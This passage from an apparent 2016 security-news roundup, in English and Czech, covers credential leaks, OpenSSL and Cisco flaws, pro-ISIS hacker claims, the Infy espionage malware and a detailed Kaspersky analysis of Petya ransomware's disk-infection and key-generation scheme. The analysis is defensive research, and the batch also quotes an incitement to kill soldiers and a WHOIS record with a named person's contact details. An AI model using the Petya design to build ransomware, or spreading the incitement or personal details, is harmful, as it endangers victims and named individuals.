According to the report, the mostly compromised credentials, 57 Million, belong to Russia’s leading email provider Mail.ru, followed by 40 Million Yahoo accounts, Microsoft 33 Million Hotmail accounts and 24 million Gmail accounts.
Of those 272 Million records analyzed by Hold Security, around 42.5 Million were credentials that the company has not seen traded on the Dark Web before.
In fact, the initial checks by Mail.ru found no active combinations of user names and passwords that match their existing email accounts, a Mail.ru spokesperson told Reuters.
Just last week, PwnedList, a website with the largest database of stolen credentials that allows users to check if a data breach had compromised their emails account, has been hit by hackers.
More than 866 million account credentials collected and indexed from 101,000 data breaches were leaked online due to a vulnerability on PwnedList's website.
A High-Severity flaw in OpenSSL allows the HTTPS Traffic decryption
5.5.2016 Vulnerebility
OpenSSL has the patches for six flaws including two high-severity bugs that could allow attackers to decrypt HTTPS traffic and execute malicious code on the server.
OpenSSL just released several patches to fix vulnerabilities in the open-source cryptographic library, including a couple of high-severity flaws (CVE-2016-2107, CVE-2016-2108) that could be exploited to decrypt HTTPS Traffic.
The CVE-2016-2107 could be exploited by hackers to launch a man-in-the-middle attack leveraging on the ‘Padding Oracle Attack’ that can decrypt HTTPS traffic if the connection uses AES-CBC cipher and the server supports AES-NI.
OpenSSL 2
The Padding Oracle decryption flaw allows an attacker to repeatedly probe an encrypted payload in the attempt to retrieve the plaintext. The flaw was first spotted by Juraj Somorovsky that released also a tool called TLS-Attacker to exploit it.
According to the experts, the flaw affects the OpenSSL cryptographic library since 2013, when maintainers of the project fixed another Padding Oracle flaw called Lucky 13.
“A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI.” states the advisory issued by the OpenSSL. “This issue was introduced as part of the fix for Lucky 13 padding attack (CVE-2013-0169). The padding check was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes.”
The second flaw (CVE-2016-2108), ranked as a high-severity issue, is a buffer overflow vulnerability in the OpenSSL that only affects OpenSSL versions prior to April 2015.
The ASN.1 encoding the value zero represented as a negative integer can cause a buffer underflow resulting in memory corruption due to the writing out-of-bounds in the i2c_ASN1_INTEGER. An attacker can exploit the vulnerability to execute malicious code on the web server.
“This issue affected versions of OpenSSL prior to April 2015. The bug causing the vulnerability was fixed on April 18th 2015, and released as part of the June 11th 2015 security releases. The security impact of the bug was not known at the time. In previous versions of OpenSSL, ASN.1 encoding the value zero represented as a negative integer can cause a buffer underflow with an out-of-bounds write in i2c_ASN1_INTEGER. The ASN.1 parser does not normally create “negative zeroes” when parsing ASN.1 input, and therefore, an attacker cannot trigger this bug.” states the advisory.
If an application deserializes untrusted ASN.1 structures containing an ANY field, and later reserializes them, an attacker may be able to trigger the flaw causing the out-of-bounds write. The flaw can be triggered, for example, by using maliciously-crafted digital certificates signed by trusted certificate authorities.
“Applications that parse and re-encode X509 certificates are known to be vulnerable. Applications that verify RSA signatures on X509 certificates may also be vulnerable; however, only certificates with valid signatures trigger ASN.1 re-encoding and hence the bug. “
OpenSSL also fixed other four low-severity vulnerabilities, a memory exhaustion issue, a bug that resulted in arbitrary stack data being returned in the buffer and two overflow vulnerabilities.
Administrators using OpenSSL versions 1.0.1 and 1.0.2 need to install the security updates as soon as possible.
Isis hackers claim to have infiltrated the UK Ministry of Defence
5.5.2016 Hacking
Pro-ISIS hackers belonging to the Islamic State Hacking Division group brag they have planted a mole at the heart of British Intelligence.
Last week pro-ISIS hacker group who is calling itself the Islamic State Hacking Division has published a “Kill list” of dozens of American military personnel purportedly involved in drone strikes against the IS in Syria and Iraq.
ISIS
The hackers leaked online personal details of more than 70 US personnel.
“Kill them wherever they are, knock on their doors and behead them, stab them, shoot them in the face or bomb them.”
The intelligence experts that analyzed the Kill list published by the Islamic State Hacking Division confirmed that its content has been gathered from publicly available sources and isn’t the result of any security breach.
The hackers of the Islamic State Hacking Division claimed to have infiltrated a mole in Britain’s Ministry of Defence and threatened to publish “secret intelligence” information.
“In our next leak we may even disclose secret intelligence the Islamic State has just received from a source the brothers in the UK have spent some time acquiring from the Ministry of Defence in London as we slowly and secretly infiltrate England and the USA online and off.” states a tweet published by the group.
“While we don’t comment on cyber threats, Britain is a world leader in cyber security and we are investing more than ever before in the UK’s capabilities to protect our national interest. Our increasing defence budget means that we can stay ahead of our adversaries in cyberspace while also investing in conventional capabilities.” said a Ministry of Defence spokesperson.
A Pentagon spokesperson, the major Adrian Rankine-Galloway, explained that the US intelligence is adopting the necessary measures to protect its staff.
“We are aware that Isil [Isis] and other terrorist organisations have periodically purported to release personal information on US service members and military members of our coalition partners involved in operations against Isil. We take proactive measures to protect our service members and their families and keep them apprised of changes to the security situation.” said major Adrian Rankine-Galloway. “We will not comment on the authenticity of the information in question, and this will have no effect on operations against Isil,”
According to the Sun, the Intelligence experts fear a possible attack against the UK, information circulating on the Internet reports the terror group could use Ireland as a base of operations to hit the Britain.
Members of the ISIS could launch plots against Britain exploiting lax border controls in Ireland, The Telegraph cited the declaration of an unnamed minister that confirmed it is easy to cross the border from the Republic.
Source The Mirror UK
“There is an issue to do with the open border because if you can get into southern Ireland you have got border-free access in to the UK.” explained the minister. “So someone could come from abroad or be radicalised in Ireland and move easily across the border in to the UK.”
Attackers can hack CISCO TelePresence boxes with an HTTP request
5.5.2016 Vulnerebility
Cisco Systems has found and fixed a critical vulnerability tied to its CISCO TelePresence hardware that allowed attackers to access it via an API bug.
Cisco announced it has patched a critical flaw (CVE-2016-1387) affecting its TelePresence systems that allowed unauthorized third-parties to access them by exploiting an API bug. The vulnerability has been rated as critical by CISCO that promptly alerted customers to have discovered the flaw alongside with two “high risk” denial of service flaws in the FirePOWER firewall hardware.
The US-CERT also issued an alert on Wednesday reporting the link to the CISCO advisories that detail the flaws.
Cisco has released three security patches to address the flaws in the TelePresence, FirePower and Adaptive Security Appliance lines.
Regarding the Cisco TelePresence system, the company is warning about the XML Application Programming Interface Authentication Bypass Vulnerability which is caused by the improper implementation of authentication mechanisms for the XML API. The attackers could exploit by using a specifically crafted HTTP request to the XML API that allows them to issue control commands modify the system settings.
“The vulnerability is due to improper implementation of authentication mechanisms for the XML API of the affected software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the XML API. A successful exploit could allow the attacker to perform unauthorized configuration changes or issue control commands to the affected system by using the API.” states the advisory published by CISCO.
Cisco fixed also a vulnerability (CVE-2016-1369) in the Adaptive Security Appliance with FirePower services that could be exploited by attackers to crash the appliance by sending a flood of specially crafted IP packets. The attack could allow the attacker to shut down the Cisco FirePOWER module and stop the traffic inspection.
“A vulnerability in the kernel logging configuration for Firepower System Software for the Adaptive Security Appliance (ASA) 5585-X FirePOWER Security Services Processor (SSP) module could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition due to high consumption of system resources. ” states Cisco.
The third flaw (CVE-2016-1368) affects the FirePower System Software that allows attackers to launch a denial of service attack. The vulnerable devices belong to the FirePower 7000 and 8000 series hardware. Also in this case attackers can trigger the flaw to knock offline the system or cause a reboot.
“A vulnerability in the packet processing functions of Cisco FirePOWER System Software could allow an unauthenticated, remote attacker to cause an affected system to stop inspecting and processing packets, resulting in a denial of service (DoS) condition.” states the CISCO advisory.
“The vulnerability is due to improper packet handling by the affected software when packets are passed through the sensing interfaces of an affected system. An attacker could exploit this vulnerability by sending crafted packets through a targeted system.”
Cisco and US-CERT are urging administrators t0 install the patches released by the company.
Ruský hacker dal k volně dispozici 232 milionů hesel k e-mailům
5.5.2016 Hacking
Dnes, Jan Vítek, aktualitaAnonymní ruský hacker, který si sám říká "the Collector" dal volně k dispozici celou svou databázi čítající 232 milionů údajů o e-mailových účtech, a to včetně hesel. Ohroženi se mohou cítit především uživatelé Mail.ru, ale také Yahoo, Hotmail či Gmail.
Nicméně situace nebude tak vážná, jak se může na první pohled jevit. Mladý sběratel dal k dispozici data, která by v ideálním případě (jak pro koho) mohla být využita pro přístup k 232 milionům unikátních e-mailových účtů na různých serverech a databáze obsahuje celkem 1,17 miliardy záznamů. Původně za tato data chtěl jen 50 rublů, ale nakonec se rozhodl, že mu budou stačit "lajky" na jeho sociálním účtu a vedle nich se dočkal také slov chvály.
K datům se tak pochopitelně mohli snadno dostat i lidé z firmy Holden Security LLC starající se o zabezpečení, dle nichž se v databázi nachází přes 57 milionů přihlašovacích údajů k účtům na Mail.ru (tato služba má aktuálně 64 milionů uživatelů), dále 40 milionů na Yahoo Mail, 33 milionů na Microsoft Hotmail a 24 milionů na Gmail. Je ale otázka, do jaké míry je "the Collector" hacker a do jaké míry bychom ho mohli označit jen za nadšence, který jen rád sbírá takové údaje. Firma totiž oznámila, že přinejmenším 85 procent z databáze jsou již dříve zveřejněná data, a tak je na této kolekci pozoruhodné především to, že jde o největší databázi svého druhu, kterou dal volně k dispozici pouze jednotlivec.
Společnost Holden Security LLC se specializuje na kyberzločiny ve východní Evropě a sama říká, že s hackery nevyjednává tak, aby získala jejich data za odměnu. Zde to ale udělat mohla, neboť mladý Rus získal pouze několik palců nahoru. K této záležitosti se také vyjádřili zástupci serveru Mail.ru a Microsoftu, zatímco Yahoo a Google zatím mlčí.
Mail.ru vzkázal svým uživatelům, že uvolněné informace zkoumá a pak bude případně varovat své uživatele, kteří by mohli být ohroženi. Dosud totiž nebyla nalezena žádná kombinace jména a hesla, která by fungovala. Microsoft se zase slovy svého mluvčího vyjádřil prostě tak, že podobné úniky jsou bohužel realita. Microsoft využívá jistá bezpečnostní opatření, která mají za úkol detekovat nestandardní využití účtu a v takovém případě si server od přihlašujícího se uživatle vyžádá další informace, aby ověřil jeho identitu.
Z 232 milionů záznamů tu jsou ale 4 miliony, které ještě nikdy dříve neunikly, a právě na ty se tak nyní zaměřují bezpečnostní firmy a provozovatelé serverů. Nutno poznamenat, že útočníkům jejich práci často ulehčují samotní uživatelé. Když v roce 2013 uniklo nějakých 152 milionů jmen a hesel z firmy Adobe, která je ukládala pomocí formátu Data Encryption Standard (DES), objevilo se, že pozoruhodně velké množství lidí si vybralo jako heslo "123456" či jinou jednoduchou posloupnost, pak bylo populární "password" nebo "qwerty".
Co ale může udělat samotný uživatel, aby zjistil, zda jeho přihlašovací údaje mohly být ukradeny? Může využít třeba databázi na adrese haveibeenpwned.com, kde stále jednoznačně "vede" společnost Adobe s výše zmíněnými 152 miliony přihlašovacích údajů.
Hackeři zaútočili na web řecké centrální banky. Chystají se na další banky ve světě
5.5.2016 Hacking
Počítačoví piráti napojení na skupinu Anonymous vyřadili z provozu internetovou stránku řecké centrální banky. Jde podle nich o první ze světových centrálních bank, na které hodlají během měsíce zaútočit. Informoval o tom ve středu zpravodajský server CNN.
Web řecké centrální banky v úterý na několik minut spadl, než se jej personálu banky podařilo opět obnovit.
Poradce banky pro styk s veřejností Spyros Frangos řekl CNN, že žádné dokumenty nebyly ukradeny ani zničeny. Banka při útoku nepřišla o žádné peníze.
Útok byl typu DDOS, tedy odepření služby provedené distribuovaným útokem. Probíhá tak, že směrem k napadanému serveru je vysláno obrovské množství požadavků. K serveru, pokud přímo nezkolabuje, se pak nemohou dostat legitimní uživatelé.
CNN napsal, že útok byl relativně slabý. Hackeři ovšem na serveru YouTube uvedli, že si vzali na mušku globální finanční systém, který je podle nich "tyranskou institucí".
Hodlají prý zaútočit i na weby jiných centrálních bank z celého světa. Kampaň, kterou pojmenovali Operace Ikaros, prý potrvá 30 dní.
Skupina Anonymous se v uplynulých letech rozštěpila. Její název nyní používá mnoho hackerských skupin, které navzájem nemusí být nijak propojené. Inkriminované video na internetu zveřejnila okrajová přidružená skupina.
The Infy malware, a long running threat from Iran
5.5.2016 Virus
Researchers at Palo Alto Networks have come across a new threat used by alleged Iran-linked Hackers in attacks since 2007.
Security experts at Palo Alto Networks discovered a new malware, named Infy, that has been likely used by hackers from Iran in cyber espionage operations at least since 2007.
The researchers discovered the Infy malware in May, it was used by threat actors in spear phishing attacks. In one case the malicious emails were sent from a compromised Israeli Gmail account to an industrial organization in Israel, a similar message was received in the same period by a US government organization.
“Based on various attributes of these files and the functionality of the malware they install, we have identified and collected over 40 variants of a previously unpublished malware family we call Infy, which has been involved in attacks stretching back to 2007. Attacks using this tool were still active as of April 2016.” states the analysis published by Palo Alto Networks on the Infy malware. based on a string used by the threat actor in filenames and command and control (C&C) folder names and strings.
The name Infy malware is based on a string used by the VXer in filenames and command and control (C&C) folder names and strings.
The Infy malware was first submitted to VirusTotal on August 2007, meanwhile, the C&C domain used by the oldest sample spotted by the experts has been associated with a malicious campaign dated back December 2004.
The malware evolved over the years, the authors improved it by implementing new features such as support for the Microsoft Edge web browser that was introduced in the version 30.
The activity of the threat actor increased after 2011 and according to the experts it is still ongoing.
According to the researchers from Palo Alto Networks, the Infy malware was used in surgical operations, making hard the investigations of the experts that were not able to link the various incidents.
“We believe that we have uncovered a decade-long operation that has successfully stayed under the radar for most of its existence as targeted espionage originating from Iran. It is aimed at governments and businesses of multiple nations as well as its own citizens.” continues Palo Alto Networks.
The experts Researchers identified 12 domains used by the threat actors as C&C servers. Some of the C&C servers were also reported in a detailed analysis published by the Danish Defense Intelligence Service’s Center for Cybersecurity, which had spotted similar attacks against Danish Government targets.
The analysis of WHOIS information and IP addresses associated with the C&C domains suggests that the threat actors have Iranian origin.
“The “aminjalali_58 (at) yahoo.com” email address is associated with 6 known C2 domains, dating back to 2010. Unlike the fake WHOIS examples, this example has content more consistent with the email address:”
amin jalali
safehostonline
afriqa street number 68
tehran
Tehran
19699
IR
+98.935354252
aminjalali_58 (at) yahoo.com
“The name “Amin Jalali” is not unique, though it does appear to have Iranian-specific origins.” states Palo Alto Networks.
Security experts believe that Iranian hackers are rapidly improving their cyber capabilities, they observed a significant evolution after the Stuxnet attacks in 2010.
The activity of Iranian hackers is increased in a significant way in the last couple of years, in December 2015 Symantec has uncovered the Cadelle and Chafer groups, two Iran-based hacker teams that were tracking dissidents and activists, in November 2015,
Facebook first discovered spear phishing attacks of Iranian hackers on State Department employees, in December 2014 hackers used a Visual Basic malware to wipe out data of corporate systems at Las Vegas Sands Corp.
Probably the most blatant operation conducted by Iranian hackers is the one that hit computer systems at the oil company Saudi Aramco.
272 Million login credentials found in the criminal underground
5.5.2016 Hacking
Hundreds of millions of hacked login credentials for email accounts and other websites are available in the Russian criminal underworld.
Security researchers at the Hold Security firm have discovered a young Russian hacker claiming to have acquired 1.17 billion stolen credential records.
Alex Hold, the founder and chief information security officer at Hold Security, explained he shocked when he verified that huge volume of stolen login credentials obtained by the hacker, is composed of more than 272.3 million stolen accounts.
The huge quantity of login credentials appears to be the cumulative results of many different security breaches.
The Reuters news agency discovered that the huge archive of stolen login credentials includes 57 million of mail.ru accounts.
“Hundreds of millions of hacked user names and passwords for email accounts and other websites are being traded in Russia’s criminal underworld, a security expert told Reuters.” reported the Reuters. “The discovery of 272.3 million stolen accounts included a majority of users of Mail.ru, Russia’s most popular email service, and smaller fractions of Google, Yahoo and Microsoft email users, said Alex Holden, founder and chief information security officer of Hold Security.
The archive also includes tens of millions Yahoo Mail credentials, Microsoft Hotmail accounts, and Gmail email accounts.
“Yahoo Mail credentials numbered 40 million, or 15 percent of the 272 million unique IDs discovered. Meanwhile, 33 million, or 12 percent, were Microsoft Hotmail accounts and 9 percent, or nearly 24 million, were Gmail, according to Holden.”
A Microsoft spokesman confirmed the authenticity of the stolen login credentials, Yahoo and Google did not respond to requests for comment.
Thousands of credentials appear to belong employees of some of the largest US companies, including banks and retail firms.
The majority of stolen login credentials was already traded in the criminal underground, but 42.5 million credentials have not been seen in the underworld before.
“This kid from a small town in Russia,” writes Holden, “collected an incredible 1.17 Billion stolen credentials from numerous breaches that we are still working on identifying. 272 million of those credentials turned out to be unique, which in turn, translated to 42.5 million credentials – 15% of the total, that we have never seen before.”
This is one of the biggest stashes of stolen login credentials discovered in the recent years. On august 2014, experts at Hold Security discovered the biggest database of stolen user names and passwords and email addresses, the news was reported by The New York Times that hired an independent security expert who verified the authenticity of stolen data.
The U.S.-based Internet security company have discovered the amazing amount of data, nearly 1.2Billion credentials and half a billion email addresses, that is considered the single biggest amount of stolen Internet identity information ever collected. The experts believe that the data was collected from the numerous data breaches occurred all over the world in the last months and that hit around 420,000 websites.
Petya: the two-in-one trojan
4.5.2016 Zdroj: Kaspersky Virus
Infecting the Master Boot Record (MBR) and encrypting files is nothing new in the world of malicious programs. Back in 1994, the virus OneHalf emerged that infected MBRs and encrypted the disk contents. However, that virus did not extort money. In 2011, MBR blocker Trojans began spreading (Trojan-Ransom.Win32.Mbro) that infected the MBR and prevented the operating system from loading further. The victim was prompted to pay a ransom to get rid of the problem. It was easy to treat a system infected by these blocker Trojans because, apart from the MBR, they usually didn’t encrypt any data on the disk.
Today, we have encountered a new threat that’s a blast from the past. The Petya Trojan (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Petr) infects the MBR preventing normal system loading, and encrypts the Master File Table (MFT), an important part of the NT file system (NTFS), thus preventing normal access to files on the hard drive.
The infection scenario
The people spreading Petya attack their potential victims by sending spam messages containing links that download a ZIP archive. The archive contains the Trojan’s executable file and a JPEG image. The file names are in German (Bewerbungsunterlagen.PDF.exe, Bewerbungsmappe-gepackt.exe), are made to look like resumes for job candidates, and target HR staff in German-speaking countries.
Contents of the archives downloaded from links in spam
The cybercriminals didn’t bother with automatic escalation of privileges – the manifest of the Trojan’s executable file contains the following standard record:
If the user launches the malicious executable file Petya, Windows will show the standard UAC request for privilege escalation. If the system has been properly configured by the system administrators (i.e. UAC is enabled, and the user is not working from an administrator account), the Trojan won’t be able to run any further.
Unfortunately, a user who has the privileges to agree to a UAC request often underestimates the potential risks associated with launching unknown software with elevated rights.
How it works
The executable file and the packer
A Petya Trojan infection begins with the launch of the malicious executable file. The samples of the Trojan that Kaspersky Lab received for analysis are, just like most other malware samples, protected with a customized packer. When the executable file launches, the malicious packer’s code begins to work – it unpacks the malicious DLL Setup.dll into a newly designated RAM area, and then passes control to it.
Cybercriminals typically use packers to avoid detection – circumvent static signatures, trick the heuristic analyzer, etc. While investigating the Petya packer, we noticed an unusual trick used by the cybercriminals.
Cybercriminals often try to create the packer in such a way that a packed malicious executable file looks as similar as possible to a regular legitimate file. Sometimes, they take a legitimate file and substitute part of the code with malicious code. That’s what they did with Petya, with one interesting peculiarity: it was a part of the standard compiler-generated runtime DLL that was replaced with malicious code, while the function WinMain remained intact. The illustration below shows the transition, beginning from the entry point (“start”). As can be seen, the function of unpacking malicious code (which we dubbed “evil”) is called from the legal function __calloc_crt which is part of the runtime code.
Diagram of transitions between the malicious packer’s functions
Why do it that way? Obviously, the creators of the malicious packer were trying to trick an inattentive researcher or automatic analyzers: the file looks legitimate – WinMain doesn’t contain malicious code – so it’s possible that it will be overlooked. Besides, if the breakpoint is set at WinMain during debugging, then the malicious code works (and sends the system into BSOD, as we will discuss later in detail) and execution is over before the breakpoint is even reached.
Kaspersky Lab has detected Petya samples that masquerade as legitimate files written in C/C++ and in Delphi.
The malicious DLL
Setup.dll is a DLL with just one export: _ZuWQdweafdsg345312@0. It is written in C and compiled in Microsoft Visual Studio. The cybercriminals used an implementation of cryptographic algorithms available in the public library mbedtls (formerly polarssl). Setup.dll is not saved to the hard drive as a separate file, but always remains in the RAM.
When Setup.dll receives control, it decrypts the data contained in the section ‘.xxxx’ and then proceeds to infect the victim computer.
The encrypted ‘.xxxx’ section containing data
Fragment of the decrypted data from the ‘.xxxx’ section
At a higher degree of abstraction, the actions of Setup.dll come down to the following:
Re-write the boot record on the hard drive with its own malicious loader;
Generate a key, infection ID and other auxiliary information, and save them to the hard drive;
Cause a system abort and reboot, thereby passing control to the malicious loader.
Now let’s look in detail at how all of this is implemented in the Trojan. But before doing so, we need to define the terminology used.
Hard disk sector – the minimum addressable unit of a hard drive, typically 512 bytes.
Master boot record (MBR) – the code and the data written to Sector 0. After hardware is initialized, this code is used to boot the PC. Also, this sector contains the hard disks’ partition table. A disk partitioned with MBR may have up to four primary partitions, and the maximum partition size is ~2.2 TB.
GUID Partition Table (GPT) – a more modern standard of hard drive layout. It supports up to 128 partitions, each up to 9.4 ZB in size (1 ZB = 1021 bytes.)
Now let’s return to the Trojan under review. Setup.dll can infect disks partitioned according to either the older MBR standard or the more modern GPT standard. There are two alternative branches of execution sequences in the malicious program; the choice of execution branch depends on the data in the field PartitionStyle of the structure PARTITION_INFORMATION_EX.
Selection of the execution branch for disk infection, depending on whether the disk has MBR or GPT partitioning
Infecting an MBR disk
When infecting an MBR disk, Setup.dll performs the following actions:
Encrypts sector 0 (the original code and the MBR data) with the simple operation XOR 0x37 (ASCII ‘7’), writes the result to sector 56;
Encrypts sectors 1-33 with the same operation XOR 0x37;
Generates configuration data for the malicious loader, writes them to sector 54;
Creates the verification sector 55 populated with the repeating byte 0x37;
Copies the disk’s NT signature and the partition table saved from the original MBR into its own first-level loader; writes first-level malicious code to sector 0 of the disk, and writes second-level code to sectors 34-50 (referred to here as the malicious loader);
Calls the function NtRaiseHardError, which causes the operating system to crash (BSOD – the ‘blue screen of death’).
When an MBR disk has been infected, the beginning of the disk has the following structure:
Number of sector Content
0 First-level malicious loader
1 – 33 Encrypted sectors 1-33 (XOR 0x37)
34 – 50 Second-level malicious code
…
54 Configuration sector of the malicious program
55 Verification sector (populated with byte 0x37)
56 Encrypted original MBR code (XOR 0x37)
Infecting a GPT disk
When infecting a GPT disk, Setup.dll performs more actions:
Based on Primary GPT Header data, it receives the address of GPT header copy;
Encrypts the GPT header copy with XOR 0x37;
Performs all the actions that are performed when encrypting an MBR disk.
When a GPT disk has been infected, the beginning of the disk has the following structure:
Number of sector Content
0 First-level malicious loader
1 – 33 Encrypted sectors 1-33 (XOR 0x37)
34 – 50 Second-level malicious code
…
54 Configuration sector of the malicious program
55 Verification sector (populated with byte 0x37)
56 Encrypted original MBR code (XOR 0x37)
…
Backup LBA –
Backup LBA + 33 Encrypted copy of GPT Header (XOR 0x37)
Generation of configuration data
In the configuration sector (sector 54), the Trojan keeps the data it needs to encrypt MFT and decrypt it if the victim pays the ransom. Generation of the configuration data consists of the following steps:
Setup.dll generates a random string that is 16 characters long [1-9, a-x, A-X]; we will call this string password;
Generate a pair of keys: ec_session_priv (a private key, a random large integer number) + ec_session_pub (public key, a point on a standard elliptic curve secp192k1);
Calculate the session secret: session_secret = ECDH (ec_session_priv, ec_master_pub); the cybercriminals’ public key ec_master_pub is contained in the Trojan’s body;
Calculate the aes_key = SHA512(session_secret) – only the first 32 bytes of the hash sum are used;
Encrypt the ‘password’ string by XORing it with the first 16 bytes of ec_session_pub: password_xor = ec_session_pub[0, 15] xor password;
Encrypt the result using AES-256 with the key aes_key: password_aes_encr = AES_enc(password_xor);
Create the array ec_session_data = [ec_session_pub, password_aes_encr];
Calculate base58: ec_session_data_b58 = base58_enc(ec_session_data);
Use the result to calculate SHA256: digest = sha256(ec_session_data_b58);
Create array: ec_data = [check1, check2, ec_session_data_b58], where check1, check2 are bytes calculated by the formulas:
a = digest[0] & 0xF;
b = (digest[0] & 0xF) < 10;
check1 = (digest[0] >> 4) + 0x57 + ((digest[0] >> 4) < 10 ? 0xD9 : 0);
check2 = a + 0x57 + (b ? 0xD9 : 0);
Based on the ‘password’, create a key for MFT encryption;
Pseudocode creating a key for MFT encryption
Generate IV – 8 random bytes which will be used during MFT encryption;
Generate infection ID and use it to create “personalized” URLs for ransom payment webpages.
Ultimately, the configuration data structure looks like this:
In C language syntax, this structure can be presented as follows:
This is what the configuration data looks like after it is written to the hard drive:
Note that if the user turns off their computer after this stage and doesn’t switch it on again, only minimum damage will be done, as it is not difficult to decrypt data encrypted with 1-byte XOR. Therefore, a good piece of advice: if you launch an unknown file and your system suddenly crashes, showing a blue screen, you should switch off your computer and get help from a qualified specialist. The specialist should be able to identify a Petya infection and restore the disk sectors encrypted with XOR.
If, however, the computer was re-booted, then the Trojan’s third stage kicks in – the malicious code written to sectors 0 and 34–50.
The malicious loader
After rebooting, the code in sector 0 (the first-level loader) gains control. It loads the main second-level malicious code from sectors 34–50 into the memory and passes control to it. This code, in turn, receives information about the hard drives available in the system, searches for the disk where the configuration is written, reads the configuration data from sector 54 and, depending on the value in the field ‘config.state’, begins encryption (if the value is 0) or asks the user to enter the decryption key that they have purchased (if the value is 1).
Fragment of code implementing the Trojan’s logic
Encryption of MFT
The master file table (MFT) is a data structure with information about every file and directory on a volume formatted into NTFS, the file system that is used in all modern versions of Windows. The table contains the service data required to find each file on the disk. It can be compared to a table of contents in a book that tells you on which page to find a chapter. Similarly, MFT indicates which logical cluster a file is located in.
It is namely this critical area that is attacked by Petya. If the value of ‘config.state’ is equal to 0 during launch, it does the following:
Displays a fake disk check message:
Reads the key ‘config.salsa_key’ from the configuration sector into a local array; sets this field to zero on the disk, sets ‘config.state’ field at 1;
Encrypts the verification sector 55 with the stream cipher Salsa20; this sector is populated beforehand with the byte 0x37 (see the section ‘Infecting an MBR disk’ above);
Searches for each partition’s MFT on each connected hard drive;
Encrypts the MFT data with cipher Salsa20. Encryption is performed in parts of 8 sectors (i.e. the size of each part is 4 KB). A counter of the encrypted parts is kept in sector 57 of the first disk.
When encryption is over, it triggers a system reboot.
After the reboot, Petya displays an animated image of a flashing red and white skull drawn in ACCII-art style.
If the user presses any key, the Trojan displays a text which tells the victim in no uncertain terms what has happened.
Ransom demand and decryption
On this screen Petya displays links to the ransom payment webpages located in the Tor network (the addresses are specified in config.mal_urls), and the “personal decryption code” which the victim has to enter at either of the above sites. In reality, this “code” is the content of the field ‘config.ec_data’, hyphenated every six characters.
So, how do the cybercriminals plan to decrypt MFT, and are they even capable of doing so?
The ‘Key:’ field on this screen accepts a text string from the user. This string is checked for length (a 16-character long string is required), and then the Trojan uses it to calculate a 32-byte ‘salsa_key’ (following the algorithm discussed above in the section ‘Generation of configuration data’). The Trojan then attempts to decrypt the verification sector 55 with this key, and checks that the decrypted sector is completely populated with the byte 0x37. If it is, the key is considered correct, and Petya uses it to decrypt MFT. Then it decrypts all starting sectors encrypted with XOR 0x37, decrypts the original MBR and prompts the user to reboot the computer.
Thus, the correct string to be entered in the ‘Key:’ field is that very same ‘password‘ string that is generated in the first step when the configuration data is created.
Screen message displayed after successful decryption
The question remains: how do the cybercriminals know this string so they can communicate it to a victim who has paid the ransom? No automatic communication with C&C servers is established during the entire infection life cycle. The answer lies in the description of the algorithm for generating configuration data.
The victim is prompted to manually enter their “personal decryption code” ec_data on the ransom payment webpage. The cybercriminal can then perform the following actions:
Decode base58: base58_dec(ec_session_data_b58) = ec_session_data = [ec_session_pub, password_aes_encr]
Calculate session_secret = ECDH(ec_session_pub, ec_master_priv), in accordance with the Elliptic curve Diffie–Hellman properties, where ec_master_priv is a private key known to the Trojan’s creators only;
Calculate aes_key = SHA256(session_secret);
Decrypt AES-256: password_xor = AES_dec(password_encr);
Knowing ec_session_pub, calculate the original password based on password_xor.
The ransom payment webpage
When we visit the Tor site at the URL provided by the Trojan, we see a page that requires a CAPTCHA to be entered, after which the main ransom payment page is loaded. The design of the page immediately catches the eye, with its hammer and sickle and the word ‘ransomware’ in pseudo-Cyrillic. It looks like a USSR parody along the lines of the game Red Alert.
This page displays a countdown clock showing when the ransom price will be doubled, as well as regularly updated links to news and publications related to Petya.
When the ‘Start the decryption process’ button is pressed, you end up on a page that asks you to enter the value of ‘ec_data’, which is now called “your identifier” rather than “your personal decryption code”. It looks like the cybercriminals still haven’t decided what to call this part.
When the user enters this string, the site displays the amount of ransom in BTC, information on how to purchase bitcoins, and the address where the money should be sent.
As well as that, there are two other pages on the website: FAQ and Support.
The FAQ page
The FAQ page is interesting in that it contains false information: in reality, RSA is not used by the Trojan in any way, at any stage of infection.
The Support page
On the Support page, the user is given the option of sending a message to the cybercriminals. One phrase in particular stands out: “Please write your message in english, our russian speaking staff is not always available”. This implies that there is at least one person in the group who speaks Russian.
Geographic distribution
As we noted above, the spam messages target German-speaking victims. KSN statistics clearly show that Germany is the main target for the cybercriminals.
TOP 5 countries attacked by Petya Trojan by the number of attacked users:
Country Number of attacked users
1 Germany 579
2 China 19
3 India 8
4 Japan 5
5 Russian Federation 5
Conclusion
After analyzing the Petya Trojan, we discovered that it is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system.
Although Petya is noticeably different from the majority of ransomware that has emerged in the recent years, it can hardly be described as a fundamentally new development. The ideas behind the Trojan have been seen before in earlier malware; the creators of Petya have simply combined them all in a single creation. That said, it should be acknowledged that it requires a certain degree of technical skill to implement a low-level code to encrypt and decrypt data prior to OS booting.
Another interesting peculiarity about Petya is the pseudo-Soviet graphic design on the ransom payment website; the name of the Trojan also fits into the image of a “Russian Trojan” designed by cybercriminals. There is no certainty as to whether the Trojan’s creators originally come from Russia or other former Soviet states; however, the text on the payment page suggests there is at least one Russian speaker in the gang.
Kaspersky Lab’s products protect users from this threat: Petya’s executable files are detected with the verdict Trojan-Ransom.Win32.Petr; in addition, the behavior analyzer proactively detects even unknown versions of this Trojan with the verdict PDM:Trojan.Win32.Generic.
P.S. How to decrypt your data without paying the ransom
On April 8, some independent researchers reported that they had found a method of restoring the password wihout paying the ransom to the cybercriminals. The method is based on a genetic algorithm; with the 8-byte long IV (stored in configuration sector 54) and the content of the encrypted verification sector 55, you can calculate the value of the password that generates the salsa key, which can then be used to decrypt the MFT.
Kaspersky DDoS Intelligence Report for Q1 2016
4.5.2016 Zdroj:Kaspersky Attack
Q1 events
We have selected the events from the first quarter of 2016 that, in our view, illustrate the main trends in the field of DDoS attacks and the tools used to perform them.
A record-breaking reflection DDoS attack
